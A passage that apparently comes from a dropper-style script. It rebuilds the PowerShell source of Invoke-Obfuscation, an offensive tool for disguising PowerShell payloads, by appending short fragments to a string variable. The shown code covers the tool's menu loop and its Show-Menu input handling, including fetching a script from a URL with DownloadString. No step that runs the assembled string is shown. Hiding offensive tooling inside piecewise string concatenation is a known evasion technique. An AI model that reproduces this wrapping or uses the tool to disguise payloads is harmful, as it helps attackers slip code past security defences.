$ExitInputOpt"
Ouzw = Ouzw + "ions = $ExitCommandInputOptions[0]
$MenuInputO"
Ouzw = Ouzw + "ptions = $BackCommandInputOptions[0]
# Ob"
Ouzw = Ouzw + "ligatory ASCII Art.
Show-AsciiArt
Start-Sl"
Ouzw = Ouzw + "eep -Seconds 2
# Show Help Menu once at b"
Ouzw = Ouzw + "eginning of script.
Show-HelpMenu
# M"
Ouzw = Ouzw + "ain loop for user interaction. Show-Menu function "
Ouzw = Ouzw + "displays current function along with acceptable in"
Ouzw = Ouzw + "put options (defined in arrays instantiated above)"
Ouzw = Ouzw + ".
# User input and validation is handled withi"
Ouzw = Ouzw + "n Show-Menu.
$UserResponse = ''
While($Exi"
Ouzw = Ouzw + "tInputOptions -NotContains ([String]$UserResponse)"
Ouzw = Ouzw + ".ToLower())
{
$UserResponse = ([String"
Ouzw = Ouzw + "]$UserResponse).Trim()
If($HomeMenuInputO"
Ouzw = Ouzw + "ptions[0] -Contains ([String]$UserResponse).ToLowe"
Ouzw = Ouzw + "r())
{
$UserResponse = ''
"
Ouzw = Ouzw + " }
# Display menu if it is defined in "
Ouzw = Ouzw + "a menu variable with $UserResponse in the variable"
Ouzw = Ouzw + " name.
If(Test-Path ('Variable:' + "MenuLe"
Ouzw = Ouzw + "vel$UserResponse"))
{
$UserRes"
Ouzw = Ouzw + "ponse = Show-Menu (Get-Variable "MenuLevel$UserRes"
Ouzw = Ouzw + "ponse").Value $UserResponse $Script:OptionsMenu
"
Ouzw = Ouzw + " }
Else
{
Write-E"
Ouzw = Ouzw + "rror "The variable MenuLevel$UserResponse does not"
Ouzw = Ouzw + " exist."
$UserResponse = 'quit'
"
Ouzw = Ouzw + " }
If(($UserResponse -eq 'quit')"
Ouzw = Ouzw + " -AND $CliWasSpecified -AND !$NoExitWasSpecified)
"
Ouzw = Ouzw + " {
Write-Output $Script:Obfusca"
Ouzw = Ouzw + "tedCommand.Trim("`n")
$UserInput = 'qu"
Ouzw = Ouzw + "it'
}
}
}
# Get location of this scr"
Ouzw = Ouzw + "ipt no matter what the current directory is for th"
Ouzw = Ouzw + "e process executing this script.
$ScriptDir = [Sys"
Ouzw = Ouzw + "tem.IO.Path]::GetDirectoryName($myInvocation.MyCom"
Ouzw = Ouzw + "mand.Definition)
Function Show-Menu
{
<#
.SYNOP"
Ouzw = Ouzw + "SIS
HELPER FUNCTION :: Displays current menu with"
Ouzw = Ouzw + " obfuscation navigation and application options fo"
Ouzw = Ouzw + "r Invoke-Obfuscation.
Invoke-Obfuscation Function"
Ouzw = Ouzw + ": Show-Menu
Author: Daniel Bohannon (@danielhbohan"
Ouzw = Ouzw + "non)
License: Apache License, Version 2.0
Required"
Ouzw = Ouzw + " Dependencies: None
Optional Dependencies: None
"
Ouzw = Ouzw + ".DESCRIPTION
Show-Menu displays current menu with"
Ouzw = Ouzw + " obfuscation navigation and application options fo"
Ouzw = Ouzw + "r Invoke-Obfuscation.
.PARAMETER Menu
Specifies "
Ouzw = Ouzw + "the menu options to display, with acceptable input"
Ouzw = Ouzw + " options parsed out of this array.
.PARAMETER Men"
Ouzw = Ouzw + "uName
Specifies the menu header display and the b"
Ouzw = Ouzw + "readcrumb used in the interactive prompt display.
"
Ouzw = Ouzw + "
.PARAMETER Script:OptionsMenu
Specifies the scri"
Ouzw = Ouzw + "pt-wide variable containing additional acceptable "
Ouzw = Ouzw + "input in addition to each menu's specific acceptab"
Ouzw = Ouzw + "le input (e.g. EXIT, QUIT, BACK, HOME, MAIN, etc.)"
Ouzw = Ouzw + ".
.EXAMPLE
C:\PS> Show-Menu
.NOTES
This is a p"
Ouzw = Ouzw + "ersonal project developed by Daniel Bohannon while"
Ouzw = Ouzw + " an employee at MANDIANT, A FireEye Company.
.LIN"
Ouzw = Ouzw + "K
http://www.danielbohannon.com
#>
Param(
"
Ouzw = Ouzw + " [Parameter(ValueFromPipeline = $true)]
"
Ouzw = Ouzw + " [ValidateNotNullOrEmpty()]
[Object[]]
"
Ouzw = Ouzw + " $Menu,
[String]
$MenuName,"
Ouzw = Ouzw + "
[Object[]]
$Script:OptionsMenu
"
Ouzw = Ouzw + " )
# Extract all acceptable values from $Me"
Ouzw = Ouzw + "nu.
$AcceptableInput = @()
$SelectionConta"
Ouzw = Ouzw + "insCommand = $FALSE
ForEach($Line in $Menu)
"
Ouzw = Ouzw + " {
# If there are 4 items in each $Line i"
Ouzw = Ouzw + "n $Menu then the fourth item is a command to exec "
Ouzw = Ouzw + "if selected.
If($Line.Count -eq 4)
"
Ouzw = Ouzw + " {
$SelectionContainsCommand = $TRUE
"
Ouzw = Ouzw + " }
$AcceptableInput += ($Line[1]).Tr"
Ouzw = Ouzw + "im(' ')
}
$UserInput = $NULL
Whi"
Ouzw = Ouzw + "le($AcceptableInput -NotContains $UserInput)
{"
Ouzw = Ouzw + "
# Format custom breadcrumb prompt.
"
Ouzw = Ouzw + " Write-Host "`n"
$BreadCrumb = $MenuName."
Ouzw = Ouzw + "Trim('_')
If($BreadCrumb.Length -gt 1)
"
Ouzw = Ouzw + " {
If($BreadCrumb.ToLower() -eq 's"
Ouzw = Ouzw + "how options')
{
$Bread"
Ouzw = Ouzw + "Crumb = 'Show Options'
}
I"
Ouzw = Ouzw + "f($MenuName -ne '')
{
"
Ouzw = Ouzw + "# Handle specific case substitutions from what is "
Ouzw = Ouzw + "ALL CAPS in interactive menu and then correct casi"
Ouzw = Ouzw + "ng we want to appear in the Breadcrumb.
"
Ouzw = Ouzw + " $BreadCrumbOCD = @()
$Bre"
Ouzw = Ouzw + "adCrumbOCD += , @('ps' ,'PS')
"
Ouzw = Ouzw + " $BreadCrumbOCD += , @('cmd' ,'Cmd')
"
Ouzw = Ouzw + " $BreadCrumbOCD += , @('wmic' ,'Wmic')
"
Ouzw = Ouzw + " $BreadCrumbOCD += , @('rundll' ,'Ru"
Ouzw = Ouzw + "nDll')
$BreadCrumbOCD += , @('var+"
Ouzw = Ouzw + "' ,'Var+')
$BreadCrumbOCD += , "
Ouzw = Ouzw + "@('stdin+' ,'StdIn+')
$BreadCrumb"
Ouzw = Ouzw + "OCD += , @('clip+' ,'Clip+')
$Br"
Ouzw = Ouzw + "eadCrumbOCD += , @('var++' ,'Var++')
"
Ouzw = Ouzw + " $BreadCrumbOCD += , @('stdin++' ,'StdIn++')
"
Ouzw = Ouzw + " $BreadCrumbOCD += , @('clip++' ,'C"
Ouzw = Ouzw + "lip++')
$BreadCrumbOCD += , @('run"
Ouzw = Ouzw + "dll++','RunDll++')
$BreadCrumbOCD "
Ouzw = Ouzw + "+= , @('mshta++' ,'Mshta++')
$Bre"
Ouzw = Ouzw + "adCrumbArray = @()
ForEach($Crumb "
Ouzw = Ouzw + "in $BreadCrumb.Split('_'))
{
"
Ouzw = Ouzw + " # Perform casing substitutions for "
Ouzw = Ouzw + "any matches in $BreadCrumbOCD array.
"
Ouzw = Ouzw + " $StillLookingForSubstitution = $TRUE
"
Ouzw = Ouzw + " ForEach($Substitution in $BreadCrumb"
Ouzw = Ouzw + "OCD)
{
"
Ouzw = Ouzw + " If($Crumb.ToLower() -eq $Substitution[0])
"
Ouzw = Ouzw + " {
$Br"
Ouzw = Ouzw + "eadCrumbArray += $Substitution[1]
"
Ouzw = Ouzw + " $StillLookingForSubstitution = $FALSE
"
Ouzw = Ouzw + " }
}
"
Ouzw = Ouzw + " # If no substitution occurred a"
Ouzw = Ouzw + "bove then simply upper-case the first character an"
Ouzw = Ouzw + "d lower-case all the remaining characters.
"
Ouzw = Ouzw + " If($StillLookingForSubstitution)
"
Ouzw = Ouzw + " {
$BreadCr"
Ouzw = Ouzw + "umbArray += $Crumb.SubString(0,1).ToUpper() + $Cru"
Ouzw = Ouzw + "mb.SubString(1).ToLower()
"
Ouzw = Ouzw + " # If no substitution was found for the 3rd or lat"
Ouzw = Ouzw + "er BreadCrumb element (only for Launcher BreadCrum"
Ouzw = Ouzw + "b) then throw a warning so we can add this substit"
Ouzw = Ouzw + "ution pair to $BreadCrumbOCD.
"
Ouzw = Ouzw + " If(($BreadCrumb.Split('_').Count -eq 2) -AND ("
Ouzw = Ouzw + "$BreadCrumb.StartsWith('Launcher_')) -AND ($Crumb "
Ouzw = Ouzw + "-ne 'Launcher'))
{
"
Ouzw = Ouzw + " Write-Warning "No substituion"
Ouzw = Ouzw + " pair was found for `$Crumb=$Crumb in `$BreadCrumb"
Ouzw = Ouzw + "=$BreadCrumb. Add this `$Crumb substitution pair t"
Ouzw = Ouzw + "o `$BreadCrumbOCD array in Invoke-Obfuscation."
"
Ouzw = Ouzw + " }
}
"
Ouzw = Ouzw + " }
$BreadCrumb = $Bread"
Ouzw = Ouzw + "CrumbArray -Join '\'
}
$Br"
Ouzw = Ouzw + "eadCrumb = '\' + $BreadCrumb
}
"
Ouzw = Ouzw + " # Output menu heading.
$FirstLine = "
Ouzw = Ouzw + ""Choose one of the below "
If($BreadCrumb "
Ouzw = Ouzw + "-ne '')
{
$FirstLine = $FirstL"
Ouzw = Ouzw + "ine + $BreadCrumb.Trim('\') + ' '
}
"
Ouzw = Ouzw + " Write-Host "$FirstLine" -NoNewLine
"
Ouzw = Ouzw + " # Change color and verbiage if selection will "
Ouzw = Ouzw + "execute command.
If($SelectionContainsComm"
Ouzw = Ouzw + "and)
{
Write-Host "options" -N"
Ouzw = Ouzw + "oNewLine -ForegroundColor Green
Write-"
Ouzw = Ouzw + "Host " to" -NoNewLine
Write-Host " APP"
Ouzw = Ouzw + "LY" -NoNewLine -ForegroundColor Green
"
Ouzw = Ouzw + "Write-Host " to current payload" -NoNewLine
"
Ouzw = Ouzw + " }
Else
{
Write-Host "
Ouzw = Ouzw + ""options" -NoNewLine -ForegroundColor Yellow
"
Ouzw = Ouzw + " }
Write-Host ":`n"
ForEach"
Ouzw = Ouzw + "($Line in $Menu)
{
$LineSpace "
Ouzw = Ouzw + " = $Line[0]
$LineOption = $Line[1]
"
Ouzw = Ouzw + " $LineValue = $Line[2]
Write-"
Ouzw = Ouzw + "Host $LineSpace -NoNewLine
# If not e"
Ouzw = Ouzw + "mpty then include breadcrumb in $LineOption output"
Ouzw = Ouzw + " (is not colored and won't affect user input synta"
Ouzw = Ouzw + "x).
If(($BreadCrumb -ne '') -AND ($Lin"
Ouzw = Ouzw + "eSpace.StartsWith('[')))
{
"
Ouzw = Ouzw + " Write-Host ($BreadCrumb.ToUpper().Trim('\') +"
Ouzw = Ouzw + " '\') -NoNewLine
}
"
Ouzw = Ouzw + " # Change color if selection will execute com"
Ouzw = Ouzw + "mand.
If($SelectionContainsCommand)
"
Ouzw = Ouzw + " {
Write-Host $LineOption"
Ouzw = Ouzw + " -NoNewLine -ForegroundColor Green
}
"
Ouzw = Ouzw + " Else
{
Writ"
Ouzw = Ouzw + "e-Host $LineOption -NoNewLine -ForegroundColor Yel"
Ouzw = Ouzw + "low
}
# Add a"
Ouzw = Ouzw + "dditional coloring to string encapsulated by <> if"
Ouzw = Ouzw + " it exists in $LineValue.
If($LineValu"
Ouzw = Ouzw + "e.Contains('<') -AND $LineValue.Contains('>'))
"
Ouzw = Ouzw + " {
$FirstPart = $LineValu"
Ouzw = Ouzw + "e.SubString(0,$LineValue.IndexOf('<'))
"
Ouzw = Ouzw + " $MiddlePart = $LineValue.SubString($FirstPart"
Ouzw = Ouzw + ".Length+1)
$MiddlePart = $MiddlePa"
Ouzw = Ouzw + "rt.SubString(0,$MiddlePart.IndexOf('>'))
"
Ouzw = Ouzw + " $LastPart = $LineValue.SubString($FirstPa"
Ouzw = Ouzw + "rt.Length+$MiddlePart.Length+2)
Wr"
Ouzw = Ouzw + "ite-Host "`t$FirstPart" -NoNewLine
"
Ouzw = Ouzw + " Write-Host $MiddlePart -NoNewLine -ForegroundColo"
Ouzw = Ouzw + "r Cyan
# Handle if more than one "
Ouzw = Ouzw + "term needs to be output in different color.
"
Ouzw = Ouzw + " If($LastPart.Contains('<') -AND $LastPar"
Ouzw = Ouzw + "t.Contains('>'))
{
"
Ouzw = Ouzw + " $LineValue = $LastPart
$"
Ouzw = Ouzw + "FirstPart = $LineValue.SubString(0,$LineValue.Ind"
Ouzw = Ouzw + "exOf('<'))
$MiddlePart = $Line"
Ouzw = Ouzw + "Value.SubString($FirstPart.Length+1)
"
Ouzw = Ouzw + " $MiddlePart = $MiddlePart.SubString(0,$Midd"
Ouzw = Ouzw + "lePart.IndexOf('>'))
$LastPart"
Ouzw = Ouzw + " = $LineValue.SubString($FirstPart.Length+$Middl"
Ouzw = Ouzw + "ePart.Length+2)
Write-Host "$F"
Ouzw = Ouzw + "irstPart" -NoNewLine
Write-Hos"
Ouzw = Ouzw + "t $MiddlePart -NoNewLine -ForegroundColor Cyan
"
Ouzw = Ouzw + " }
Write-Host $LastPa"
Ouzw = Ouzw + "rt
}
Else
{
"
Ouzw = Ouzw + " Write-Host "`t$LineValue"
"
Ouzw = Ouzw + " }
}
# Prompt for user i"
Ouzw = Ouzw + "nput with custom breadcrumb prompt.
Write-"
Ouzw = Ouzw + "Host ''
If($UserInput -ne '') {Write-Host "
Ouzw = Ouzw + "''}
$UserInput = ''
While"
Ouzw = Ouzw + "(($UserInput -eq '') -AND ($Script:CompoundCommand"
Ouzw = Ouzw + ".Count -eq 0))
{
# Output cust"
Ouzw = Ouzw + "om prompt.
Write-Host "Invoke-Obfuscat"
Ouzw = Ouzw + "ion$BreadCrumb> " -NoNewLine -ForegroundColor Mage"
Ouzw = Ouzw + "nta
# Get interactive user input if C"
Ouzw = Ouzw + "liCommands input variable was not specified by use"
Ouzw = Ouzw + "r.
If(($Script:CliCommands.Count -gt 0"
Ouzw = Ouzw + ") -OR ($Script:CliCommands -ne $NULL))
"
Ouzw = Ouzw + " {
If($Script:CliCommands.GetType("
Ouzw = Ouzw + ").Name -eq 'String')
{
"
Ouzw = Ouzw + " $NextCliCommand = $Script:CliCommands.Tri"
Ouzw = Ouzw + "m()
$Script:CliCommands = @()
"
Ouzw = Ouzw + " }
Else
"
Ouzw = Ouzw + " {
$NextCliCommand = ([Str"
Ouzw = Ouzw + "ing]$Script:CliCommands[0]).Trim()
"
Ouzw = Ouzw + " $Script:CliCommands = For($i=1; $i -lt $Scrip"
Ouzw = Ouzw + "t:CliCommands.Count; $i++) {$Script:CliCommands[$i"
Ouzw = Ouzw + "]}
}
$UserInput ="
Ouzw = Ouzw + " $NextCliCommand
}
Else
"
Ouzw = Ouzw + " {
# If Command was defin"
Ouzw = Ouzw + "ed on command line and NoExit switch was not defin"
Ouzw = Ouzw + "ed then output final ObfuscatedCommand to stdout a"
Ouzw = Ouzw + "nd then quit. Otherwise continue with interactive "
Ouzw = Ouzw + "Invoke-Obfuscation.
If($CliWasSpec"
Ouzw = Ouzw + "ified -AND ($Script:CliCommands.Count -lt 1) -AND "
Ouzw = Ouzw + "($Script:CompoundCommand.Count -lt 1) -AND ($Scrip"
Ouzw = Ouzw + "t:QuietWasSpecified -OR !$NoExitWasSpecified))
"
Ouzw = Ouzw + " {
If($Script:Quie"
Ouzw = Ouzw + "tWasSpecified)
{
"
Ouzw = Ouzw + " # Remove Write-Host and Start-Sleep pro"
Ouzw = Ouzw + "xy functions so that Write-Host and Start-Sleep cm"
Ouzw = Ouzw + "dlets will be called during the remainder of the i"
Ouzw = Ouzw + "nteractive Invoke-Obfuscation session.
"
Ouzw = Ouzw + " Remove-Item -Path Function:Write-Host"
Ouzw = Ouzw + "
Remove-Item -Path Functio"
Ouzw = Ouzw + "n:Start-Sleep
$Script:Qui"
Ouzw = Ouzw + "etWasSpecified = $FALSE
#"
Ouzw = Ouzw + " Automatically run 'Show Options' so the user has "
Ouzw = Ouzw + "context of what has successfully been executed.
"
Ouzw = Ouzw + " $UserInput = 'show options'"
Ouzw = Ouzw + "
$BreadCrumb = 'Show Optio"
Ouzw = Ouzw + "ns'
}
# -N"
Ouzw = Ouzw + "oExit wasn't specified and -Command was, so we wil"
Ouzw = Ouzw + "l output the result back in the main While loop.
"
Ouzw = Ouzw + " If(!$NoExitWasSpecified)
"
Ouzw = Ouzw + " {
$UserInput"
Ouzw = Ouzw + " = 'quit'
}
}
"
Ouzw = Ouzw + " Else
{
"
Ouzw = Ouzw + " $UserInput = (Read-Host).Trim()
"
Ouzw = Ouzw + " }
# Process interactive Us"
Ouzw = Ouzw + "erInput using CLI syntax, so comma-delimited and s"
Ouzw = Ouzw + "lash-delimited commands can be processed interacti"
Ouzw = Ouzw + "vely.
If(($Script:CliCommands.Coun"
Ouzw = Ouzw + "t -eq 0) -AND !$UserInput.ToLower().StartsWith('se"
Ouzw = Ouzw + "t ') -AND $UserInput.Contains(','))
"
Ouzw = Ouzw + " {
$Script:CliCommands = $Use"
Ouzw = Ouzw + "rInput.Split(',')
"
Ouzw = Ouzw + " # Reset $UserInput so current While loop "
Ouzw = Ouzw + "will be traversed once more and process UserInput "
Ouzw = Ouzw + "command as a CliCommand.
$User"
Ouzw = Ouzw + "Input = ''
}
}
"
Ouzw = Ouzw + " }
# Trim any leading trailing slashes so"
Ouzw = Ouzw + " it doesn't misinterpret it as a compound command "
Ouzw = Ouzw + "unnecessarily.
$UserInput = $UserInput.Tri"
Ouzw = Ouzw + "m('/\')
# Cause UserInput of base menu le"
Ouzw = Ouzw + "vel directories to automatically work.
# T"
Ouzw = Ouzw + "he only exception is STRING if the current MenuNam"
Ouzw = Ouzw + "e is _token since it can be the base menu STRING o"
Ouzw = Ouzw + "r TOKEN/STRING.
If((($MenuLevel | ForEach-"
Ouzw = Ouzw + "Object {$_[1].Trim()}) -Contains $UserInput.Split("
Ouzw = Ouzw + "'/\')[0]) -AND !(('string' -Contains $UserInput.Sp"
Ouzw = Ouzw + "lit('/\')[0]) -AND ($MenuName -eq '_token')) -AND "
Ouzw = Ouzw + "($MenuName -ne ''))
{
$UserInp"
Ouzw = Ouzw + "ut = 'home/' + $UserInput.Trim()
}
"
Ouzw = Ouzw + " # If current command contains \ or / and does no"
Ouzw = Ouzw + "t start with SET or OUT then we are dealing with a"
Ouzw = Ouzw + " compound command.
# Setting $Script:Compo"
Ouzw = Ouzw + "unCommand in below IF block.
If(($Script:C"
Ouzw = Ouzw + "ompoundCommand.Count -eq 0) -AND !$UserInput.ToLow"
Ouzw = Ouzw + "er().StartsWith('set ') -AND !$UserInput.ToLower()"
Ouzw = Ouzw + ".StartsWith('out ') -AND ($UserInput.Contains('\')"
Ouzw = Ouzw + " -OR $UserInput.Contains('/')))
{
"
Ouzw = Ouzw + " $Script:CompoundCommand = $UserInput.Split('/\"
Ouzw = Ouzw + "')
}
# If current command contain"
Ouzw = Ouzw + "s \ or / and does not start with SET then we are d"
Ouzw = Ouzw + "ealing with a compound command.
# Parsing "
Ouzw = Ouzw + "out next command from $Script:CompounCommand in be"
Ouzw = Ouzw + "low IF block.
If($Script:CompoundCommand.C"
Ouzw = Ouzw + "ount -gt 0)
{
$UserInput = ''
"
Ouzw = Ouzw + " While(($UserInput -eq '') -AND ($Scrip"
Ouzw = Ouzw + "t:CompoundCommand.Count -gt 0))
{
"
Ouzw = Ouzw + " # If last compound command then it wil"
Ouzw = Ouzw + "l be a string.
If($Script:Compound"
Ouzw = Ouzw + "Command.GetType().Name -eq 'String')
"
Ouzw = Ouzw + " {
$NextCompoundCommand = $S"
Ouzw = Ouzw + "cript:CompoundCommand.Trim()
$"
Ouzw = Ouzw + "Script:CompoundCommand = @()
}
"
Ouzw = Ouzw + " Else
{
"
Ouzw = Ouzw + " # If there are more commands left in compoun"
Ouzw = Ouzw + "d command then it won't be a string (above IF bloc"
Ouzw = Ouzw + "k).
# In this else block we ge"
Ouzw = Ouzw + "t the next command from CompoundCommand array.
"
Ouzw = Ouzw + " $NextCompoundCommand = ([String]$"
Ouzw = Ouzw + "Script:CompoundCommand[0]).Trim()
"
Ouzw = Ouzw + "
# Set remaining commands "
Ouzw = Ouzw + "back into CompoundCommand.
$Te"
Ouzw = Ouzw + "mp = $Script:CompoundCommand
$"
Ouzw = Ouzw + "Script:CompoundCommand = @()
F"
Ouzw = Ouzw + "or($i=1; $i -lt $Temp.Count; $i++)
"
Ouzw = Ouzw + " {
$Script:CompoundCom"
Ouzw = Ouzw + "mand += $Temp[$i]
}
"
Ouzw = Ouzw + " }
$UserInput = $NextCompound"
Ouzw = Ouzw + "Command
}
}
# Handle "
Ouzw = Ouzw + "new RegEx functionality.
# Identify if the"
Ouzw = Ouzw + "re is any regex in current UserInput by removing a"
Ouzw = Ouzw + "ll alphanumeric characters (and + or # which are f"
Ouzw = Ouzw + "ound in launcher names).
$TempUserInput = "
Ouzw = Ouzw + "$UserInput.ToLower()
@(97..122) | ForEach-"
Ouzw = Ouzw + "Object {$TempUserInput = $TempUserInput.Replace([S"
Ouzw = Ouzw + "tring]([Char]$_),'')}
@(0..9) | ForEach"
Ouzw = Ouzw + "-Object {$TempUserInput = $TempUserInput.Replace($"
Ouzw = Ouzw + "_,'')}
$TempUserInput = $TempUserInput.Rep"
Ouzw = Ouzw + "lace(' ','').Replace('+','').Replace('#','').Repla"
Ouzw = Ouzw + "ce('\','').Replace('/','').Replace('-','').Replace"
Ouzw = Ouzw + "('?','')
If(($TempUserInput.Length -gt 0)"
Ouzw = Ouzw + " -AND !($UserInput.Trim().ToLower().StartsWith('se"
Ouzw = Ouzw + "t ')) -AND !($UserInput.Trim().ToLower().StartsWit"
Ouzw = Ouzw + "h('out ')))
{
# Replace any si"
Ouzw = Ouzw + "mple wildcard with .* syntax.
$UserInp"
Ouzw = Ouzw + "ut = $UserInput.Replace('.*','_____').Replace('*',"
Ouzw = Ouzw + "'.*').Replace('_____','.*')
# Prepend"
Ouzw = Ouzw + " UserInput with ^ and append with $ if not already"
Ouzw = Ouzw + " there.
If(!$UserInput.Trim().StartsWi"
Ouzw = Ouzw + "th('^') -AND !$UserInput.Trim().StartsWith('.*'))
"
Ouzw = Ouzw + " {
$UserInput = '^' + $"
Ouzw = Ouzw + "UserInput
}
If(!$UserInput"
Ouzw = Ouzw + ".Trim().EndsWith('$') -AND !$UserInput.Trim().Ends"
Ouzw = Ouzw + "With('.*'))
{
$UserInp"
Ouzw = Ouzw + "ut = $UserInput + '$'
}
#"
Ouzw = Ouzw + " See if there are any filtered matches in the curr"
Ouzw = Ouzw + "ent menu.
Try
{
"
Ouzw = Ouzw + " $MenuFiltered = ($Menu | Where-Object {($_[1"
Ouzw = Ouzw + "].Trim() -Match $UserInput) -AND ($_[1].Trim().Len"
Ouzw = Ouzw + "gth -gt 0)} | ForEach-Object {$_[1].Trim()})
"
Ouzw = Ouzw + " }
Catch
{
"
Ouzw = Ouzw + " # Output error message if Regular Expressio"
Ouzw = Ouzw + "n causes error in above filtering step.
"
Ouzw = Ouzw + " # E.g. Using *+ instead of *[+]
"
Ouzw = Ouzw + " Write-Host "`n`nERROR:" -NoNewLine -Foreground"
Ouzw = Ouzw + "Color Red
Write-Host ' The current"
Ouzw = Ouzw + " Regular Expression caused the following error:'
"
Ouzw = Ouzw + " write-host " $_" -ForegroundC"
Ouzw = Ouzw + "olor Red
}
# If there are"
Ouzw = Ouzw + " filtered matches in the current menu then randoml"
Ouzw = Ouzw + "y choose one for the UserInput value.
"
Ouzw = Ouzw + "If($MenuFiltered -ne $NULL)
{
"
Ouzw = Ouzw + " # Randomly select UserInput from filtered "
Ouzw = Ouzw + "options.
$UserInput = (Get-Random "
Ouzw = Ouzw + "-Input $MenuFiltered).Trim()
# Ou"
Ouzw = Ouzw + "tput randomly chosen option (and filtered options "
Ouzw = Ouzw + "selected from) if more than one option were return"
Ouzw = Ouzw + "ed from regex.
If($MenuFiltered.Co"
Ouzw = Ouzw + "unt -gt 1)
{
#"
Ouzw = Ouzw + " Change color and verbiage if acceptable options w"
Ouzw = Ouzw + "ill execute an obfuscation function.
"
Ouzw = Ouzw + " If($SelectionContainsCommand)
"
Ouzw = Ouzw + " {
$ColorToOutput = "
Ouzw = Ouzw + "'Green'
}
"
Ouzw = Ouzw + "Else
{
"
Ouzw = Ouzw + " $ColorToOutput = 'Yellow'
}
"
Ouzw = Ouzw + " Write-Host "`n`nRandomly selec"
Ouzw = Ouzw + "ted " -NoNewline
Write-Host $U"
Ouzw = Ouzw + "serInput -NoNewline -ForegroundColor $ColorToOutpu"
Ouzw = Ouzw + "t
write-host " from the follow"
Ouzw = Ouzw + "ing filtered options: " -NoNewline
"
Ouzw = Ouzw + " For($i=0; $i -lt $MenuFiltered.Count-1; $i++"
Ouzw = Ouzw + ")
{
Wr"
Ouzw = Ouzw + "ite-Host $MenuFiltered[$i].Trim() -NoNewLine -Fore"
Ouzw = Ouzw + "groundColor $ColorToOutput
"
Ouzw = Ouzw + " Write-Host ', ' -NoNewLine
}
"
Ouzw = Ouzw + " Write-Host $MenuFiltered[$Menu"
Ouzw = Ouzw + "Filtered.Count-1].Trim() -NoNewLine -ForegroundCol"
Ouzw = Ouzw + "or $ColorToOutput
}
}
"
Ouzw = Ouzw + " }
# If $UserInput is all numbers "
Ouzw = Ouzw + "and is in a menu in $MenusWithMultiSelectNumbers
"
Ouzw = Ouzw + " $OverrideAcceptableInput = $FALSE
$"
Ouzw = Ouzw + "MenusWithMultiSelectNumbers = @('\Launcher')
"
Ouzw = Ouzw + " If(($UserInput.Trim(' 0123456789').Length -eq 0"
Ouzw = Ouzw + ") -AND $BreadCrumb.Contains('\') -AND ($MenusWithM"
Ouzw = Ouzw + "ultiSelectNumbers -Contains $BreadCrumb.SubString("
Ouzw = Ouzw + "0,$BreadCrumb.LastIndexOf('\'))))
{
"
Ouzw = Ouzw + " $OverrideAcceptableInput = $TRUE
}
"
Ouzw = Ouzw + "
If($ExitInputOptions -Contains $Us"
Ouzw = Ouzw + "erInput.ToLower())
{
Return $E"
Ouzw = Ouzw + "xitInputOptions[0]
}
ElseIf($MenuI"
Ouzw = Ouzw + "nputOptions -Contains $UserInput.ToLower())
"
Ouzw = Ouzw + " {
# Commands like 'back' that will r"
Ouzw = Ouzw + "eturn user to previous interactive menu.
"
Ouzw = Ouzw + " If($BreadCrumb.Contains('\')) {$UserInput = $Br"
Ouzw = Ouzw + "eadCrumb.SubString(0,$BreadCrumb.LastIndexOf('\'))"
Ouzw = Ouzw + ".Replace('\','_')}
Else {$UserInput = "
Ouzw = Ouzw + "''}
Return $UserInput.ToLower()
"
Ouzw = Ouzw + " }
ElseIf($HomeMenuInputOptions[0] -Cont"
Ouzw = Ouzw + "ains $UserInput.ToLower())
{
R"
Ouzw = Ouzw + "eturn $UserInput.ToLower()
}
ElseI"
Ouzw = Ouzw + "f($UserInput.ToLower().StartsWith('set '))
"
Ouzw = Ouzw + " {
# Extract $UserInputOptionName and "
Ouzw = Ouzw + "$UserInputOptionValue from $UserInput SET command."
Ouzw = Ouzw + "
$UserInputOptionName = $NULL
"
Ouzw = Ouzw + " $UserInputOptionValue = $NULL
$Ha"
Ouzw = Ouzw + "sError = $FALSE
$UserInputMinusSe"
Ouzw = Ouzw + "t = $UserInput.SubString(4).Trim()
If("
Ouzw = Ouzw + "$UserInputMinusSet.IndexOf(' ') -eq -1)
"
Ouzw = Ouzw + " {
$HasError = $TRUE
"
Ouzw = Ouzw + " $UserInputOptionName = $UserInputMinusSet.Tri"
Ouzw = Ouzw + "m()
}
Else
{
"
Ouzw = Ouzw + " $UserInputOptionName = $UserInputM"
Ouzw = Ouzw + "inusSet.SubString(0,$UserInputMinusSet.IndexOf(' '"
Ouzw = Ouzw + ")).Trim().ToLower()
$UserInputOpti"
Ouzw = Ouzw + "onValue = $UserInputMinusSet.SubString($UserInputM"
Ouzw = Ouzw + "inusSet.IndexOf(' ')).Trim()
}
"
Ouzw = Ouzw + " # Validate that $UserInputOptionName is defi"
Ouzw = Ouzw + "ned in $SettableInputOptions.
If($Sett"
Ouzw = Ouzw + "ableInputOptions -Contains $UserInputOptionName)
"
Ouzw = Ouzw + " {
# Perform separate va"
Ouzw = Ouzw + "lidation for $UserInputOptionValue before setting "
Ouzw = Ouzw + "value. Set to 'emptyvalue' if no value was entered"
Ouzw = Ouzw + ".
If($UserInputOptionValue.Length "
Ouzw = Ouzw + "-eq 0) {$UserInputOptionName = 'emptyvalue'}
"
Ouzw = Ouzw + " Switch($UserInputOptionName.ToLower())
"
Ouzw = Ouzw + " {
'scriptpath'"
Ouzw = Ouzw + " {
If($UserInputOptionValu"
Ouzw = Ouzw + "e -AND ((Test-Path $UserInputOptionValue) -OR ($Us"
Ouzw = Ouzw + "erInputOptionValue -Match '(http|https)://')))
"
Ouzw = Ouzw + " {
"
Ouzw = Ouzw + " # Reset ScriptBlock in case it contained a value."
Ouzw = Ouzw + "
$Script:ScriptBlock ="
Ouzw = Ouzw + " ''
"
Ouzw = Ouzw + " # Check if user-input ScriptPath is a URL o"
Ouzw = Ouzw + "r a directory.
If($Use"
Ouzw = Ouzw + "rInputOptionValue -Match '(http|https)://')
"
Ouzw = Ouzw + " {
"
Ouzw = Ouzw + " # ScriptPath is a URL.
"
Ouzw = Ouzw + "
# Download"
Ouzw = Ouzw + " content.
$Script:"
Ouzw = Ouzw + "ScriptBlock = (New-Object Net.WebClient).DownloadS"
Ouzw = Ouzw + "tring($UserInputOptionValue)
"
Ouzw = Ouzw + "
# Set scri"
Ouzw = Ouzw + "pt-wide variables for future reference.
"
Ouzw = Ouzw + " $Script:ScriptPath "
Ouzw = Ouzw + " = $UserInputOptionValue
"
Ouzw = Ouzw + " $Script:ObfuscatedCommand = $S"
Ouzw = Ouzw + "cript:ScriptBlock
"
Ouzw = Ouzw + "$Script:ObfuscatedCommandHistory = @()
"
Ouzw = Ouzw + " $Script:ObfuscatedCommandHis"
Ouzw = Ouzw + "tory += $Script:ScriptBlock
"
Ouzw = Ouzw + " $Script:CliSyntax = @()
"
